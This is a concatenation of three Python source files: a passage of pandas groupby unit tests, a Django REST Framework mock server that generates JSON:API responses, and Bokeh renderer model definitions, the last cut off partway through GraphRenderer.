result = df.groupby(bins, observed=observed).median()
expected = df.groupby(bins, observed=observed).agg(lambda x: x.median())
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"dtype", ["int8", "int16", "int32", "int64", "float32", "float64", "uint64"]
)
@pytest.mark.parametrize(
"method,data",
[
("first", {"df": [{"a": 1, "b": 1}, {"a": 2, "b": 3}]}),
("last", {"df": [{"a": 1, "b": 2}, {"a": 2, "b": 4}]}),
("min", {"df": [{"a": 1, "b": 1}, {"a": 2, "b": 3}]}),
("max", {"df": [{"a": 1, "b": 2}, {"a": 2, "b": 4}]}),
("nth", {"df": [{"a": 1, "b": 2}, {"a": 2, "b": 4}], "args": [1]}),
("count", {"df": [{"a": 1, "b": 2}, {"a": 2, "b": 2}], "out_type": "int64"}),
],
)
def test_groupby_non_arithmetic_agg_types(dtype, method, data):
# GH9311, GH6620
df = pd.DataFrame(
[{"a": 1, "b": 1}, {"a": 1, "b": 2}, {"a": 2, "b": 3}, {"a": 2, "b": 4}]
)
df["b"] = df.b.astype(dtype)
if "args" not in data:
data["args"] = []
if "out_type" in data:
out_type = data["out_type"]
else:
out_type = dtype
exp = data["df"]
df_out = pd.DataFrame(exp)
df_out["b"] = df_out.b.astype(out_type)
df_out.set_index("a", inplace=True)
grpd = df.groupby("a")
t = getattr(grpd, method)(*data["args"])
tm.assert_frame_equal(t, df_out)
@pytest.mark.parametrize(
"i",
[
(
Timestamp("2011-01-15 12:50:28.502376"),
Timestamp("2011-01-20 12:50:28.593448"),
),
(24650000000000001, 24650000000000002),
],
)
def test_groupby_non_arithmetic_agg_int_like_precision(i):
# see gh-6620, gh-9311
df = pd.DataFrame([{"a": 1, "b": i[0]}, {"a": 1, "b": i[1]}])
grp_exp = {
"first": {"expected": i[0]},
"last": {"expected": i[1]},
"min": {"expected": i[0]},
"max": {"expected": i[1]},
"nth": {"expected": i[1], "args": [1]},
"count": {"expected": 2},
}
for method, data in grp_exp.items():
if "args" not in data:
data["args"] = []
grouped = df.groupby("a")
res = getattr(grouped, method)(*data["args"])
assert res.iloc[0].b == data["expected"]
@pytest.mark.parametrize(
"func, values",
[
("idxmin", {"c_int": [0, 2], "c_float": [1, 3], "c_date": [1, 2]}),
("idxmax", {"c_int": [1, 3], "c_float": [0, 2], "c_date": [0, 3]}),
],
)
def test_idxmin_idxmax_returns_int_types(func, values):
# GH 25444
df = pd.DataFrame(
{
"name": ["A", "A", "B", "B"],
"c_int": [1, 2, 3, 4],
"c_float": [4.02, 3.03, 2.04, 1.05],
"c_date": ["2019", "2018", "2016", "2017"],
}
)
df["c_date"] = pd.to_datetime(df["c_date"])
result = getattr(df.groupby("name"), func)()
expected = pd.DataFrame(values, index=Index(["A", "B"], name="name"))
tm.assert_frame_equal(result, expected)
def test_fill_consistency():
# GH9221
# pass thru keyword arguments to the generated wrapper
# are set if the passed kw is None (only)
df = DataFrame(
index=pd.MultiIndex.from_product(
[["value1", "value2"], date_range("2014-01-01", "2014-01-06")]
),
columns=Index(["1", "2"], name="id"),
)
df["1"] = [
np.nan,
1,
np.nan,
np.nan,
11,
np.nan,
np.nan,
2,
np.nan,
np.nan,
22,
np.nan,
]
df["2"] = [
np.nan,
3,
np.nan,
np.nan,
33,
np.nan,
np.nan,
4,
np.nan,
np.nan,
44,
np.nan,
]
expected = df.groupby(level=0, axis=0).fillna(method="ffill")
result = df.T.groupby(level=0, axis=1).fillna(method="ffill").T
tm.assert_frame_equal(result, expected)
def test_groupby_cumprod():
# GH 4095
df = pd.DataFrame({"key": ["b"] * 10, "value": 2})
actual = df.groupby("key")["value"].cumprod()
expected = df.groupby("key")["value"].apply(lambda x: x.cumprod())
expected.name = "value"
tm.assert_series_equal(actual, expected)
df = pd.DataFrame({"key": ["b"] * 100, "value": 2})
actual = df.groupby("key")["value"].cumprod()
# if overflows, groupby product casts to float
# while numpy passes back invalid values
df["value"] = df["value"].astype(float)
expected = df.groupby("key")["value"].apply(lambda x: x.cumprod())
expected.name = "value"
tm.assert_series_equal(actual, expected)
def scipy_sem(*args, **kwargs):
from scipy.stats import sem
return sem(*args, ddof=1, **kwargs)
@pytest.mark.parametrize(
"op,targop",
[
("mean", np.mean),
("median", np.median),
("std", np.std),
("var", np.var),
("sum", np.sum),
("prod", np.prod),
("min", np.min),
("max", np.max),
("first", lambda x: x.iloc[0]),
("last", lambda x: x.iloc[-1]),
("count", np.size),
pytest.param("sem", scipy_sem, marks=td.skip_if_no_scipy),
],
)
def test_ops_general(op, targop):
df = DataFrame(np.random.randn(1000))
labels = np.random.randint(0, 50, size=1000).astype(float)
result = getattr(df.groupby(labels), op)().astype(float)
expected = df.groupby(labels).agg(targop)
tm.assert_frame_equal(result, expected)
def test_max_nan_bug():
raw = """,Date,app,File
-04-23,2013-04-23 00:00:00,,log080001.log
-05-06,2013-05-06 00:00:00,,log.log
-05-07,2013-05-07 00:00:00,OE,xlsx"""
df = pd.read_csv(StringIO(raw), parse_dates=[0])
gb = df.groupby("Date")
r = gb[["File"]].max()
e = gb["File"].max().to_frame()
tm.assert_frame_equal(r, e)
assert not r["File"].isna().any()
def test_nlargest():
a = Series([1, 3, 5, 7, 2, 9, 0, 4, 6, 10])
b = Series(list("a" * 5 + "b" * 5))
gb = a.groupby(b)
r = gb.nlargest(3)
e = Series(
[7, 5, 3, 10, 9, 6],
index=MultiIndex.from_arrays([list("aaabbb"), [3, 2, 1, 9, 5, 8]]),
)
tm.assert_series_equal(r, e)
a = Series([1, 1, 3, 2, 0, 3, 3, 2, 1, 0])
gb = a.groupby(b)
e = Series(
[3, 2, 1, 3, 3, 2],
index=MultiIndex.from_arrays([list("aaabbb"), [2, 3, 1, 6, 5, 7]]),
)
tm.assert_series_equal(gb.nlargest(3, keep="last"), e)
def test_nlargest_mi_grouper():
# see gh-21411
npr = np.random.RandomState(123456789)
dts = date_range("20180101", periods=10)
iterables = [dts, ["one", "two"]]
idx = MultiIndex.from_product(iterables, names=["first", "second"])
s = Series(npr.randn(20), index=idx)
result = s.groupby("first").nlargest(1)
exp_idx = MultiIndex.from_tuples(
[
(dts[0], dts[0], "one"),
(dts[1], dts[1], "one"),
(dts[2], dts[2], "one"),
(dts[3], dts[3], "two"),
(dts[4], dts[4], "one"),
(dts[5], dts[5], "one"),
(dts[6], dts[6], "one"),
(dts[7], dts[7], "one"),
(dts[8], dts[8], "two"),
(dts[9], dts[9], "one"),
],
names=["first", "first", "second"],
)
exp_values = [
2.2129019979039612,
1.8417114045748335,
0.858963679564603,
1.3759151378258088,
0.9430284594687134,
0.5296914208183142,
0.8318045593815487,
-0.8476703342910327,
0.3804446884133735,
-0.8028845810770998,
]
expected = Series(exp_values, index=exp_idx)
tm.assert_series_equal(result, expected, check_exact=False)
def test_nsmallest():
a = Series([1, 3, 5, 7, 2, 9, 0, 4, 6, 10])
b = Series(list("a" * 5 + "b" * 5))
gb = a.groupby(b)
r = gb.nsmallest(3)
e = Series(
[1, 2, 3, 0, 4, 6],
index=MultiIndex.from_arrays([list("aaabbb"), [0, 4, 1, 6, 7, 8]]),
)
tm.assert_series_equal(r, e)
a = Series([1, 1, 3, 2, 0, 3, 3, 2, 1, 0])
gb = a.groupby(b)
e = Series(
[0, 1, 1, 0, 1, 2],
index=MultiIndex.from_arrays([list("aaabbb"), [4, 1, 0, 9, 8, 7]]),
)
tm.assert_series_equal(gb.nsmallest(3, keep="last"), e)
@pytest.mark.parametrize("func", ["cumprod", "cumsum"])
def test_numpy_compat(func):
# see gh-12811
df = pd.DataFrame({"A": [1, 2, 1], "B": [1, 2, 3]})
g = df.groupby("A")
msg = "numpy operations are not valid with groupby"
with pytest.raises(UnsupportedFunctionCall, match=msg):
getattr(g, func)(1, 2, 3)
with pytest.raises(UnsupportedFunctionCall, match=msg):
getattr(g, func)(foo=1)
def test_cummin(numpy_dtypes_for_minmax):
dtype = numpy_dtypes_for_minmax[0]
min_val = numpy_dtypes_for_minmax[1]
# GH 15048
base_df = pd.DataFrame(
{"A": [1, 1, 1, 1, 2, 2, 2, 2], "B": [3, 4, 3, 2, 2, 3, 2, 1]}
)
expected_mins = [3, 3, 3, 2, 2, 2, 2, 1]
df = base_df.astype(dtype)
expected = pd.DataFrame({"B": expected_mins}).astype(dtype)
result = df.groupby("A").cummin()
tm.assert_frame_equal(result, expected)
result = df.groupby("A").B.apply(lambda x: x.cummin()).to_frame()
tm.assert_frame_equal(result, expected)
# Test w/ min value for dtype
df.loc[[2, 6], "B"] = min_val
expected.loc[[2, 3, 6, 7], "B"] = min_val
result = df.groupby("A").cummin()
tm.assert_frame_equal(result, expected)
expected = df.groupby("A").B.apply(lambda x: x.cummin()).to_frame()
tm.assert_frame_equal(result, expected)
# Test nan in some values
base_df.loc[[0, 2, 4, 6], "B"] = np.nan
expected = pd.DataFrame({"B": [np.nan, 4, np.nan, 2, np.nan, 3, np.nan, 1]})
result = base_df.groupby("A").cummin()
tm.assert_frame_equal(result, expected)
expected = base_df.groupby("A").B.apply(lambda x: x.cummin()).to_frame()
tm.assert_frame_equal(result, expected)
# GH 15561
df = pd.DataFrame(dict(a=[1], b=pd.to_datetime(["2001"])))
expected = pd.Series(pd.to_datetime("2001"), index=[0], name="b")
result = df.groupby("a")["b"].cummin()
tm.assert_series_equal(expected, result)
# GH 15635
df = pd.DataFrame(dict(a=[1, 2, 1], b=[1, 2, 2]))
result = df.groupby("a").b.cummin()
expected = pd.Series([1, 2, 1], name="b")
tm.assert_series_equal(result, expected)
def test_cummin_all_nan_column():
base_df = pd.DataFrame({"A": [1, 1, 1, 1, 2, 2, 2, 2], "B": [np.nan] * 8})
expected = pd.DataFrame({"B": [np.nan] * 8})
result = base_df.groupby("A").cummin()
tm.assert_frame_equal(expected, result)
result = base_df.groupby("A").B.apply(lambda x: x.cummin()).to_frame()
tm.assert_frame_equal(expected, result)
def test_cummax(numpy_dtypes_for_minmax):
dtype = numpy_dtypes_for_minmax[0]
max_val = numpy_dtypes_for_minmax[2]
# GH 15048
base_df = pd.DataFrame(
{"A": [1, 1, 1, 1, 2, 2, 2, 2], "B": [3, 4, 3, 2, 2, 3, 2, 1]}
)
expected_maxs = [3, 4, 4, 4, 2, 3, 3, 3]
df = base_df.astype(dtype)
expected = pd.DataFrame({"B": expected_maxs}).astype(dtype)
result = df.groupby("A").cummax()
tm.assert_frame_equal(result, expected)
result = df.groupby("A").B.apply(lambda x: x.cummax()).to_frame()
tm.assert_frame_equal(result, expected)
# Test w/ max value for dtype
df.loc[[2, 6], "B"] = max_val
expected.loc[[2, 3, 6, 7], "B"] = max_val
result = df.groupby("A").cummax()
tm.assert_frame_equal(result, expected)
expected = df.groupby("A").B.apply(lambda x: x.cummax()).to_frame()
tm.assert_frame_equal(result, expected)
# Test nan in some values
base_df.loc[[0, 2, 4, 6], "B"] = np.nan
expected = pd.DataFrame({"B": [np.nan, 4, np.nan, 4, np.nan, 3, np.nan, 3]})
result = base_df.groupby("A").cummax()
tm.assert_frame_equal(result, expected)
expected = base_df.groupby("A").B.apply(lambda x: x.cummax()).to_frame()
tm.assert_frame_equal(result, expected)
# GH 15561
df = pd.DataFrame(dict(a=[1], b=pd.to_datetime(["2001"])))
expected = pd.Series(pd.to_datetime("2001"), index=[0], name="b")
result = df.groupby("a")["b"].cummax()
tm.assert_series_equal(expected, result)
# GH 15635
df = pd.DataFrame(dict(a=[1, 2, 1], b=[2, 1, 1]))
result = df.groupby("a").b.cummax()
expected = pd.Series([2, 1, 2], name="b")
tm.assert_series_equal(result, expected)
def test_cummax_all_nan_column():
base_df = pd.DataFrame({"A": [1, 1, 1, 1, 2, 2, 2, 2], "B": [np.nan] * 8})
expected = pd.DataFrame({"B": [np.nan] * 8})
result = base_df.groupby("A").cummax()
tm.assert_frame_equal(expected, result)
result = base_df.groupby("A").B.apply(lambda x: x.cummax()).to_frame()
tm.assert_frame_equal(expected, result)
@pytest.mark.parametrize(
"in_vals, out_vals",
[
# Basics: strictly increasing (T), strictly decreasing (F),
# abs val increasing (F), non-strictly increasing (T)
([1, 2, 5, 3, 2, 0, 4, 5, -6, 1, 1], [True, False, False, True]),
# Test with inf vals
(
[1, 2.1, np.inf, 3, 2, np.inf, -np.inf, 5, 11, 1, -np.inf],
[True, False, True, False],
),
# Test with nan vals; should always be False
(
[1, 2, np.nan, 3, 2, np.nan, np.nan, 5, -np.inf, 1, np.nan],
[False, False, False, False],
),
],
)
def test_is_monotonic_increasing(in_vals, out_vals):
# GH 17015
source_dict = {
"A": ["1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11"],
"B": ["a", "a", "a", "b", "b", "b", "c", "c", "c", "d", "d"],
"C": in_vals,
}
df = pd.DataFrame(source_dict)
result = df.groupby("B").C.is_monotonic_increasing
index = Index(list("abcd"), name="B")
expected = pd.Series(index=index, data=out_vals, name="C")
tm.assert_series_equal(result, expected)
# Also check result equal to manually taking x.is_monotonic_increasing.
expected = df.groupby(["B"]).C.apply(lambda x: x.is_monotonic_increasing)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize(
"in_vals, out_vals",
[
# Basics: strictly decreasing (T), strictly increasing (F),
# abs val decreasing (F), non-strictly increasing (T)
([10, 9, 7, 3, 4, 5, -3, 2, 0, 1, 1], [True, False, False, True]),
# Test with inf vals
(
[np.inf, 1, -np.inf, np.inf, 2, -3, -np.inf, 5, -3, -np.inf, -np.inf],
[True, True, False, True],
),
# Test with nan vals; should always be False
(
[1, 2, np.nan, 3, 2, np.nan, np.nan, 5, -np.inf, 1, np.nan],
[False, False, False, False],
),
],
)
def test_is_monotonic_decreasing(in_vals, out_vals):
# GH 17015
source_dict = {
"A": ["1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11"],
"B": ["a", "a", "a", "b", "b", "b", "c", "c", "c", "d", "d"],
"C": in_vals,
}
df = pd.DataFrame(source_dict)
result = df.groupby("B").C.is_monotonic_decreasing
index = Index(list("abcd"), name="B")
expected = pd.Series(index=index, data=out_vals, name="C")
tm.assert_series_equal(result, expected)
# describe
# --------------------------------
def test_apply_describe_bug(mframe):
grouped = mframe.groupby(level="first")
grouped.describe() # it works!
def test_series_describe_multikey():
ts = tm.makeTimeSeries()
grouped = ts.groupby([lambda x: x.year, lambda x: x.month])
result = grouped.describe()
tm.assert_series_equal(result["mean"], grouped.mean(), check_names=False)
tm.assert_series_equal(result["std"], grouped.std(), check_names=False)
tm.assert_series_equal(result["min"], grouped.min(), check_names=False)
def test_series_describe_single():
ts = tm.makeTimeSeries()
grouped = ts.groupby(lambda x: x.month)
result = grouped.apply(lambda x: x.describe())
expected = grouped.describe().stack()
tm.assert_series_equal(result, expected)
def test_series_index_name(df):
grouped = df.loc[:, ["C"]].groupby(df["A"])
result = grouped.agg(lambda x: x.mean())
assert result.index.name == "A"
def test_frame_describe_multikey(tsframe):
grouped = tsframe.groupby([lambda x: x.year, lambda x: x.month])
result = grouped.describe()
desc_groups = []
for col in tsframe:
group = grouped[col].describe()
# GH 17464 - Remove duplicate MultiIndex levels
group_col = pd.MultiIndex(
levels=[[col], group.columns],
codes=[[0] * len(group.columns), range(len(group.columns))],
)
group = pd.DataFrame(group.values, columns=group_col, index=group.index)
desc_groups.append(group)
expected = pd.concat(desc_groups, axis=1)
tm.assert_frame_equal(result, expected)
groupedT = tsframe.groupby({"A": 0, "B": 0, "C": 1, "D": 1}, axis=1)
result = groupedT.describe()
expected = tsframe.describe().T
expected.index = pd.MultiIndex(
levels=[[0, 1], expected.index],
codes=[[0, 0, 1, 1], range(len(expected.index))],
)
tm.assert_frame_equal(result, expected)
def test_frame_describe_tupleindex():
# GH 14848 - regression from 0.19.0 to 0.19.1
df1 = DataFrame(
{
"x": [1, 2, 3, 4, 5] * 3,
"y": [10, 20, 30, 40, 50] * 3,
"z": [100, 200, 300, 400, 500] * 3,
}
)
df1["k"] = [(0, 0, 1), (0, 1, 0), (1, 0, 0)] * 5
df2 = df1.rename(columns={"k": "key"})
msg = "Names should be list-like for a MultiIndex"
with pytest.raises(ValueError, match=msg):
df1.groupby("k").describe()
with pytest.raises(ValueError, match=msg):
df2.groupby("key").describe()
def test_frame_describe_unstacked_format():
# GH 4792
prices = {
pd.Timestamp("2011-01-06 10:59:05", tz=None): 24990,
pd.Timestamp("2011-01-06 12:43:33", tz=None): 25499,
pd.Timestamp("2011-01-06 12:54:09", tz=None): 25499,
}
volumes = {
pd.Timestamp("2011-01-06 10:59:05", tz=None): 1500000000,
pd.Timestamp("2011-01-06 12:43:33", tz=None): 5000000000,
pd.Timestamp("2011-01-06 12:54:09", tz=None): 100000000,
}
df = pd.DataFrame({"PRICE": prices, "VOLUME": volumes})
result = df.groupby("PRICE").VOLUME.describe()
data = [
df[df.PRICE == 24990].VOLUME.describe().values.tolist(),
df[df.PRICE == 25499].VOLUME.describe().values.tolist(),
]
expected = pd.DataFrame(
data,
index=pd.Index([24990, 25499], name="PRICE"),
columns=["count", "mean", "std", "min", "25%", "50%", "75%", "max"],
)
tm.assert_frame_equal(result, expected)
def test_groupby_mean_no_overflow():
# Regression test for (#22487)
df = pd.DataFrame(
{
"user": ["A", "A", "A", "A", "A"],
"connections": [4970, 4749, 4719, 4704, 18446744073699999744],
}
)
assert df.groupby("user")["connections"].mean()["A"] == 3689348814740003840
@pytest.mark.parametrize(
"values",
[
{
"a": [1, 1, 1, 2, 2, 2, 3, 3, 3],
"b": [1, pd.NA, 2, 1, pd.NA, 2, 1, pd.NA, 2],
},
{"a": [1, 1, 2, 2, 3, 3], "b": [1, 2, 1, 2, 1, 2]},
],
)
@pytest.mark.parametrize("function", ["mean", "median", "var"])
def test_apply_to_nullable_integer_returns_float(values, function):
# https://github.com/pandas-dev/pandas/issues/32219
output = 0.5 if function == "var" else 1.5
arr = np.array([output] * 3, dtype=float)
idx = pd.Index([1, 2, 3], dtype=object, name="a")
expected = pd.DataFrame({"b": arr}, index=idx)
groups = pd.DataFrame(values, dtype="Int64").groupby("a")
result = getattr(groups, function)()
tm.assert_frame_equal(result, expected)
result = groups.agg(function)
tm.assert_frame_equal(result, expected)
result = groups.agg([function])
expected.columns = MultiIndex.from_tuples([("b", function)])
tm.assert_frame_equal(result, expected)
def test_groupby_sum_below_mincount_nullable_integer():
# https://github.com/pandas-dev/pandas/issues/32861
df = pd.DataFrame({"a": [0, 1, 2], "b": [0, 1, 2], "c": [0, 1, 2]}, dtype="Int64")
grouped = df.groupby("a")
idx = pd.Index([0, 1, 2], dtype=object, name="a")
result = grouped["b"].sum(min_count=2)
expected = pd.Series([pd.NA] * 3, dtype="Int64", index=idx, name="b")
tm.assert_series_equal(result, expected)
result = grouped.sum(min_count=2)
expected = pd.DataFrame(
{"b": [pd.NA] * 3, "c": [pd.NA] * 3}, dtype="Int64", index=idx
)
tm.assert_frame_equal(result, expected)
|
|
import json
import re
from django.conf import settings
from django.http import HttpResponse, JsonResponse
from django.views.generic import View
from inflection import camelize, pluralize, singularize
from rest_framework import viewsets
from hooks import MockServerHookParser
from json_api_builder import (
JsonAPIErrorBuilder, JsonAPIResourceDetailBuilder, JsonAPIResourceListBuilder,
JsonAPIIncludedResourceListBuilder
)
class MockServerBaseViewSet(viewsets.ViewSet):
def request_contains_include(self, request):
return 'include' in request.GET.keys()
def _get_include_ids_from_rel_data(self, rel_data):
if isinstance(rel_data, list):
include_ids = [rd['id'] for rd in rel_data]
else:
include_ids = [rel_data['id']]
return include_ids
def get_include_ids_from_response(self, response, include_type):
if isinstance(response['data'], list):
include_ids = []
for obj in response['data']:
rel_data = obj['relationships'][include_type]['data']
include_ids.extend(self._get_include_ids_from_rel_data(rel_data))
else:
rel_data = response['data']['relationships'][include_type]['data']
include_ids = self._get_include_ids_from_rel_data(rel_data)
return set(include_ids)
def get_include_ids_from_included(self, included, include_type):
include_ids = []
for include_object in included:
try:
rel_data = include_object['relationships'][include_type]['data']
except:
pass
else:
include_ids.extend(self._get_include_ids_from_rel_data(rel_data))
break
return set(include_ids)
def add_include_objects(self, request, response, length=10, overrides=None):
include_groups = [group.split('.') for group in request.GET.get('include').split(',')]
for include_group in include_groups:
for x, include_type in enumerate(include_group):
resource_type = camelize(include_type, uppercase_first_letter=False)
if x == 0:
include_ids = self.get_include_ids_from_response(response, resource_type)
else:
include_ids = self.get_include_ids_from_included(response['included'], resource_type)
json_api_builder = JsonAPIIncludedResourceListBuilder(request,
include_type,
include_ids,
self.page_size,
length,
config=overrides)
include_objects = json_api_builder.build_include_list()
if include_objects:
response.setdefault("included", []).extend(include_objects)
return response
class ResourceDetailViewSet(MockServerBaseViewSet):
allowed_methods = ['GET', 'PATCH', 'DELETE', 'OPTIONS']
def retrieve(self, request, pk):
resource_id = pk
overrides = MockServerHookParser(request, self.attributes).parse_hooks()
if 'status' in overrides:
return HttpResponse(status=overrides['status'])
self.attributes.update(overrides.get('attributes', {}))
json_api_builder = JsonAPIResourceDetailBuilder(request,
resource_type=self.resource_type,
resource_id=resource_id,
config=overrides)
response = json_api_builder.build_resource_detail_object()
if self.request_contains_include(request):
response = self.add_include_objects(request, response, overrides=overrides)
return JsonResponse(response, status=200, content_type="application/vnd.api+json")
def partial_update(self, request, pk):
resource_id = pk
overrides = MockServerHookParser(request, self.attributes).parse_hooks()
if 'status' in overrides:
return HttpResponse(status=overrides['status'])
try:
request_data = json.loads(request.body)
if 'attributes' in request_data.get('data', {}):
overrides['attributes'].update(request_data['data']['attributes'])
except:
pass
self.attributes.update(overrides.get('attributes', {}))
json_api_builder = JsonAPIResourceDetailBuilder(request,
resource_type=self.resource_type,
resource_id=resource_id,
config=overrides)
response = json_api_builder.build_resource_detail_object()
return JsonResponse(response, status=200, content_type="application/vnd.api+json")
def destroy(self, request, pk):
resource_id = pk
overrides = MockServerHookParser(request, self.attributes).parse_hooks()
if 'status' in overrides:
return HttpResponse(status=overrides['status'])
return HttpResponse(status=204)
class ResourceListViewSet(MockServerBaseViewSet):
allowed_methods = ['GET', 'POST', 'OPTIONS']
def list(self, request):
overrides = MockServerHookParser(request, self.attributes).parse_hooks()
if 'status' in overrides:
return HttpResponse(status=overrides['status'])
curr_page = int(request.GET.get('page', 1))
page_size = int(request.GET.get('page_size', self.page_size))
filter_configs = self._parse_filters_from_query_parameters(request)
overrides['filter'] = filter_configs
length = overrides['length'] if 'length' in overrides else settings.MS_DEFAULT_LIST_LENGTH
if len(overrides['filter']):
if 'id' in overrides['filter'].keys():
length = len(overrides['filter']['id'])
else:
length = length/2
json_api_builder = JsonAPIResourceListBuilder(request,
self.resource_type,
page_size,
length,
config=overrides,
curr_page=curr_page)
response = json_api_builder.build_resource_list_object()
if self.request_contains_include(request):
response = self.add_include_objects(request, response, overrides=overrides)
return JsonResponse(response, status=200, content_type="application/vnd.api+json")
def create(self, request):
overrides = MockServerHookParser(request, self.attributes).parse_hooks()
if 'status' in overrides:
return HttpResponse(status=overrides['status'])
try:
post_data = json.loads(request.body)
resource_id = 1
resource_type = post_data['data']['type']
attributes = post_data['data']['attributes']
relationships = self._parse_relationship_data(post_data)
json_api_rules = []
is_valid_request = True
except:
is_valid_request = False
if 'errors' in overrides:
json_api_builder = JsonAPIErrorBuilder(request)
response = json_api_builder.build_error_list_object(overrides['errors'])
return JsonResponse(response, status=400, content_type="application/vnd.api+json")
elif not is_valid_request:
json_api_builder = JsonAPIErrorBuilder(request)
response = json_api_builder.build_error_list_object(self.attributes)
return JsonResponse(response, status=400, content_type="application/vnd.api+json")
else:
json_api_builder = JsonAPIResourceDetailBuilder(request,
resource_type=resource_type,
resource_id=resource_id,
config=overrides)
response = json_api_builder.build_resource_detail_object()
return JsonResponse(response, status=201, content_type="application/vnd.api+json")
def _parse_filters_from_query_parameters(self, request):
filter_configs = {}
for param, values in request.GET.iteritems():
if param.startswith('filter'):
try:
attribute = re.search(r'\[(.*?)\]', param).group(1)
if '__' in attribute:
attribute, _ = attribute.split('__')
except:
continue
try:
values = [int(value) for value in values.split(',')]
except:
values = value.split(',')
filter_configs[attribute] = values
return filter_configs
def _parse_relationship_data(self, post_data):
relationships_definitions = []
relationships = post_data['data'].get("relationships", {})
for related_resource_type, relationship_data in relationships.iteritems():
relationship_data = relationship_data['data']
if type(relationship_data) == list:
related_ids = [rd.get('id') for rd in relationship_data]
else:
related_ids = relationship_data.get('id')
relationships_definitions.append((related_resource_type, related_ids))
return relationships_definitions
class ResourceViewSet(ResourceListViewSet, ResourceDetailViewSet):
allowed_methods = ['GET', 'POST', 'PATCH', 'DELETE', 'OPTIONS']
|
|
''' Models (mostly base classes) for the various kinds of renderer
types that Bokeh supports.
'''
from __future__ import absolute_import
import logging
logger = logging.getLogger(__name__)
from ..core.enums import RenderLevel
from ..core.has_props import abstract
from ..core.properties import Auto, Bool, Either, Enum, Float, Instance, Override, String
from ..core.validation import error
from ..core.validation.errors import (BAD_COLUMN_NAME, MISSING_GLYPH, NO_SOURCE_FOR_GLYPH,
CDSVIEW_SOURCE_DOESNT_MATCH, MALFORMED_GRAPH_SOURCE)
from ..model import Model
from ..util.deprecation import deprecated
from .glyphs import Glyph, Circle, MultiLine
from .graphs import LayoutProvider, GraphHitTestPolicy, NodesOnly
from .images import ImageSource
from .sources import ColumnDataSource, DataSource, RemoteSource, CDSView
from .tiles import TileSource, WMTSTileSource
@abstract
class Renderer(Model):
'''An abstract base class for renderer types.
'''
level = Enum(RenderLevel, help="""
Specifies the level in which to paint this renderer.
""")
visible = Bool(default=True, help="""
Is the renderer visible.
""")
@abstract
class DataRenderer(Renderer):
''' An abstract base class for data renderer types (e.g. ``GlyphRenderer``, ``TileRenderer``, ``GraphRenderer``).
'''
class TileRenderer(DataRenderer):
'''
'''
tile_source = Instance(TileSource, default=lambda: WMTSTileSource(), help="""
Local data source to use when rendering glyphs on the plot.
""")
alpha = Float(1.0, help="""
tile opacity 0.0 - 1.0
""")
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen
locations when rendering glyphs on the plot. If unset, use the
default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen
locations when rendering glyphs on the plot. If unset, use the
default y-range.
""")
level = Override(default="underlay")
render_parents = Bool(default=True, help="""
Flag enable/disable drawing of parent tiles while waiting for new tiles to arrive. Default value is True.
""")
class DynamicImageRenderer(DataRenderer):
'''
'''
def __init__(self, *args, **kw):
super(DynamicImageRenderer, self).__init__(*args, **kw)
deprecated((0, 12, 7), "DynamicImageRenderer", "GeoViews for GIS functions on top of Bokeh (http://geo.holoviews.org)")
image_source = Instance(ImageSource, help="""
Image source to use when rendering on the plot.
""")
alpha = Float(1.0, help="""
tile opacity 0.0 - 1.0
""")
level = Override(default="underlay")
render_parents = Bool(default=True, help="""
Flag enable/disable drawing of parent tiles while waiting for new tiles to arrive. Default value is True.
""")
class GlyphRenderer(DataRenderer):
'''
'''
@error(MISSING_GLYPH)
def _check_missing_glyph(self):
if not self.glyph: return str(self)
@error(NO_SOURCE_FOR_GLYPH)
def _check_no_source_for_glyph(self):
if not self.data_source: return str(self)
@error(CDSVIEW_SOURCE_DOESNT_MATCH)
def _check_cdsview_source(self):
if self.data_source is not self.view.source: return str(self)
@error(BAD_COLUMN_NAME)
def _check_bad_column_name(self):
if not self.glyph: return
if not self.data_source: return
if isinstance(self.data_source, RemoteSource): return
missing = set()
specs = self.glyph.dataspecs()
for name, item in self.glyph.properties_with_values(include_defaults=False).items():
if name not in specs: continue
if not isinstance(item, dict): continue
if not isinstance(self.data_source, ColumnDataSource): continue
if 'field' in item and item['field'] not in self.data_source.column_names:
missing.add(item['field'])
if missing:
return "%s [renderer: %s]" % (", ".join(sorted(missing)), self)
def __init__(self, **kw):
super(GlyphRenderer, self).__init__(**kw)
if "view" not in kw:
self.view = CDSView(source=self.data_source)
data_source = Instance(DataSource, help="""
Local data source to use when rendering glyphs on the plot.
""")
view = Instance(CDSView, help="""
A view into the data source to use when rendering glyphs. A default view
of the entire data source is created when a view is not passed in during
initialization.
""")
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen
locations when rendering glyphs on the plot. If unset, use the
default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen
locations when rendering glyphs on the plot. If unset, use the
default -range.
""")
glyph = Instance(Glyph, help="""
The glyph to render, in conjunction with the supplied data source
and ranges.
""")
selection_glyph = Either(Auto, Instance(Glyph), default="auto", help="""
An optional glyph used for selected points.
If set to "auto" then the standard glyph will be used for selected
points.
""")
nonselection_glyph = Either(Auto, Instance(Glyph), default="auto", help="""
An optional glyph used for explicitly non-selected points
(i.e., non-selected when there are other points that are selected,
but not when no points at all are selected.)
If set to "auto" then a glyph with a low alpha value (0.1) will
be used for non-selected points.
""")
hover_glyph = Instance(Glyph, help="""
An optional glyph used for inspected points, e.g., those that are
being hovered over by a HoverTool.
""")
muted_glyph = Instance(Glyph, help="""
""")
muted = Bool(False, help="""
""")
level = Override(default="glyph")
_DEFAULT_NODE_RENDERER = lambda: GlyphRenderer(
glyph=Circle(), data_source=ColumnDataSource(data=dict(index=[]))
)
_DEFAULT_EDGE_RENDERER = lambda: GlyphRenderer(
glyph=MultiLine(), data_source=ColumnDataSource(data=dict(start=[], end=[]))
)
class GraphRenderer(DataRenderer):
'''
'''
@error(MALFORMED_GRAPH_SOURCE)
def _check_malformed_graph_source(self):
missing = []
if "index" not in self.node_renderer.data_source.column_names:
missing.append("Column 'index' is missing in GraphSource.node_renderer.data_source")
if "start" not in self.edge_renderer.data_source.column_names:
missing.append("Column 'start' is missing in GraphSource.edge_renderer.data_source")
if "end" not in self.edge_renderer.data_source.column_names:
missing.append("Column 'end' is missing in GraphSource.edge_renderer.data_source")
if missing:
return " ,".join(missing) + " [%s]" % self
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen
locations when rendering graphs on the plot. If unset, use the
default x-range.
""")
